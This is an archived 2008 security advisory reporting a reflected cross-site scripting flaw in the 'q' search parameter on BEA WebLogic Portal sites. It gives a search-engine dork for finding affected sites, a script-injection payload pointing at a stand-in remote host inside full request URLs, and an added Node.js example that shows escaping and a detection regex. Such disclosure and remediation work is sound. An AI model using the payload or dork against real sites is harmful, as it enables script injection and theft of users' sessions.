bea-xss.txt

2008-06-02T00:00:00
ID PACKETSTORM:66895
Type packetstorm
Reporter Ivan Sanchez
Modified 2008-06-02T00:00:00

Description

                                        
                                            `+============================================================================================+  
+ Oracle Corporation BEA WebLogic Portal & high XSS Vulnerabilities +  
+============================================================================================+  
  
  
Author(s): Ivan Sanchez   
  
Product:  
--------  
BEA Systems Inc  
http://www.bea.com  
Oracle Corporation BEA WebLogic Portal (and others)  
  
  
Nullcode has reported a vulnerability in BEA WebLogic Portal domains,  
which can be exploited by malicious people to conduct high-impact cross-site scripting attacks.  
  
Input passed to the "q" parameter handled by the search script "search_g4.js" isn't properly sanitised.  
  
This can be exploited to execute arbitrary remote script in a user's browser.  
  
  
The vulnerability has been reported across all *.bea.com domains, since all of these sites use the same search function.  
Other versions and other BEA products may also be affected.  
  
  
  
Google Dork:  
-----------  
  
site:bea.com/  
  
The search returns hundreds of sites.  
  
  
Vulnerable function:  
--------------------  
  
  
GET http://www.bea.com/content/search/search_g4.js HTTP/1.1  
  
search_g4.js   
  
  
In the search text box, enter for example: "><script src=http://site/evil-remote-code.js></script>  
  
  
seconds....  
  
The request is then redirected to another BEA application:  
---------------------------------------  
  
  
Referer: http://see*.bea.com/search?q="><script src=http://site/evil-remote-code.js></script>  
  
  
GET http://see*.bea.com/search?q="><script src=http://site/evil-remote-code.js></script>&x=12&y=8&ie=latin1&site=all&output=xml_no_dtd&client=www&lr=lang_en&proxystylesheet=www&oe=latin1&filter=p&source=www HTTP/1.1 => HTTP/1.1 200 OK[1.922 s]  
  
seconds..... simply exploited....  
  
  
Extract of the internal code:  
  
1-  
<form action="http://seeker.bea.com/search" method="get" class="formspace"><div class="searchSpacer3"> <label for="search"></label><input type="text" name="q" id="search" class="search" title="Enter Search Term" value="Search" onClick="this.value='';"><input type="image" src="/content/images/common/btn_arrowrt_redstr_off.gif" alt="Submit Search" width="22" height="18" border="0" onmouseover="this.src='/content/images/common/btn_arrowrt_redstr_on.gif'"onmouseout="this.src='/content/images/common/btn_arrowrt_redstr_off.gif'" style="vertical-align:bottom;">  
  
2-   
The submitted term is visible in the URL's query string.  
  
  
  
  
Solution:  
---------  
Edit the source code to ensure that user input is properly sanitised before it is echoed back into the page.  
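As an added example (not code from the advisory, from BEA or from Nullcode), the following Node.js snippet shows the unsafe reflection pattern the advisory describes beside its escaped form, using the advisory's own payload against a constructed placeholder URL. The names escapeHtml, queryTerm, renderUnsafe, renderSafe and containsInjectedMarkup, and the host search.example.test, are assumptions chosen for this illustration.

```javascript
// Added example (not code from the advisory or from BEA): how a search page
// that echoes the "q" parameter becomes XSS-prone, and the escaping fix.
// Runs under Node.js; the request URL and host are constructed placeholders.

// Escape the five characters that let attacker-controlled text break out of
// an HTML text node or a quoted attribute value.
function escapeHtml(s) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(s).replace(/[&<>"']/g, (c) => map[c]);
}

// Pull "q" out of a request URL the way a search endpoint would
// (WHATWG URL parsing, percent-decoding included).
function queryTerm(requestUrl) {
  return new URL(requestUrl).searchParams.get('q') || '';
}

// Vulnerable pattern: the raw term is concatenated into markup (equivalent to
// innerHTML = ... in the browser). A term starting with "> closes the value
// attribute and whatever follows is parsed as markup.
function renderUnsafe(q) {
  return '<input type="text" name="q" value="' + q + '">' +
         '<p>Results for ' + q + '</p>';
}

// Fixed pattern: every reflected copy of the term goes through escapeHtml().
// In a browser the same effect comes from assigning .value / .textContent
// instead of building HTML strings.
function renderSafe(q) {
  const e = escapeHtml(q);
  return '<input type="text" name="q" value="' + e + '">' +
         '<p>Results for ' + e + '</p>';
}

// Detection helper: true if the rendered HTML contains a script element or an
// event-handler attribute that is not part of the template, i.e. the term
// escaped its context.
function containsInjectedMarkup(html) {
  return /<script\b|\bon\w+\s*=/i.test(html);
}

// Constructed request using the payload shape from the advisory.
const SAMPLE_REQUEST =
  'http://search.example.test/search?q="><script src=http://site/evil-remote-code.js></script>&x=12&y=8';

const term = queryTerm(SAMPLE_REQUEST);
console.log('unsafe:', renderUnsafe(term));
console.log('injected?', containsInjectedMarkup(renderUnsafe(term)));
console.log('safe:  ', renderSafe(term));
console.log('injected?', containsInjectedMarkup(renderSafe(term)));
```

Running it prints the unsafe rendering with a live script element and the safe rendering where the same bytes appear as inert text; the regex check flags only the former. Escaping at output time, per context, is the fix the solution section calls for; input filtering alone is not enough because the term is reflected into both an attribute and a text node.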
  
  
  
  
NULL CODE SERVICES [ www.nullcode.com.ar ] Hunting Security Bugs!  
  
+============================================================================================+  